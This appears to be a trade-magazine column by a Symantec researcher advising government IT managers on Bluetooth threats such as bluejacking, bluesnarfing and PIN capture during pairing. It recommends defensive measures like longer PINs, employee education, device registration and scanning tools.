GOVERNMENT TECHNOLOGY/Getting the blues?
Bluetooth technology is becoming ubiquitous among wireless devices. The radio technology allows electronic devices, such as hand-held computers, laptops and printers, to communicate quickly without cables and over relatively long distances. However, the technology faces a problem common to all fast-emerging communications technologies: security.
There are many threats to Bluetooth devices. Bluejacking, for example, exploits a Bluetooth device’s ability to “discover” other nearby devices and sends unsolicited messages. Bluesnarfing uses the same ability to access information stored on devices. Denial-of-service, eavesdropping, and use of a victim’s phone to send data also are security problems. Numerous instances of mobile viruses, worms and Trojan horses also have emerged in the past year. CIOs and IT managers should take the following minimum precautions against Bluetooth-enabled attacks:
Identify any government-issued Bluetooth devices and alert users of known vulnerabilities
IT managers also should alert employees who were reimbursed for purchasing their own devices and check with device suppliers about emerging vulnerabilities that have not yet been publicized.
Educate employees
Bluesnarfing and Bluejacking exploit naiveté as much as they exploit security flaws. Organizations should create comprehensive guidelines that identify the risks and penalties for using Bluetooth devices, even those that are government-approved. Employees must understand that devices can be vulnerable even when not in “visible” mode.
Use caution when “pairing” devices
The dependence on PINs to create the encrypted connection between devices is the only known significant vulnerability in Bluetooth technology. Short PINs can be easily discovered if an attacker monitors when devices are paired. To prevent discovery, longer PINs should be used, and employees should not pair devices in public places. Users also should be suspicious if previously paired devices unexpectedly request a new pairing (a new attack attempts to force re-pairing so hackers can observe the PIN exchange).
Strengthen IT policies
Bluetooth PDAs sell for as little as $100, increasing the chances that employees will buy them and bring them to work. Organizations should treat unauthorized PDAs, handsets and accessories like rogue access points; if employees understand the risks of Bluetooth use, then they must be held accountable for opening back doors into the network with unauthorized devices. Employees should be required to register their personal devices with IT departments so IT staff can adequately track devices that connect to the computer network.
Look for products with control over Bluetooth
Many PDAs feature a switch that lets users turn wireless on and off. If it can be shut off with the flick of a switch, employees are more likely to comply with security policies that require them to shut off Bluetooth when it is not in use.
Consider tools for identifying and mitigating security risks
IT managers can scan their networks for attached devices and remotely disable Bluetooth in government units. The latter may be necessary because, although security risks can be reduced by shutting off the visible mode in Bluetooth, some attacks can bypass those protections.
The author is an architect for Cupertino, Calif.-based Symantec Research Labs.